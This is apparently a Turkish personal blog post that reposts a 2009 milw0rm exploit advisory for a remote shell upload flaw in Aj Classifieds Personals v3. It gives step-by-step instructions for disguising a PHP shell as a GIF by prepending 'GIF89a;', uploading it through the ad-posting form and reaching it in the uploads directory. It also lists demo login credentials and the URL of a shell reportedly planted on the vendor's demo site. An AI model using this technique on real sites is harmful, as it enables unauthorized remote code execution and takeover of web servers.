"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

17 Ocak 2009 Cumartesi

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7810



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Personal/uploadimages/20090116083033c.php

0 yorum:

 
Dizi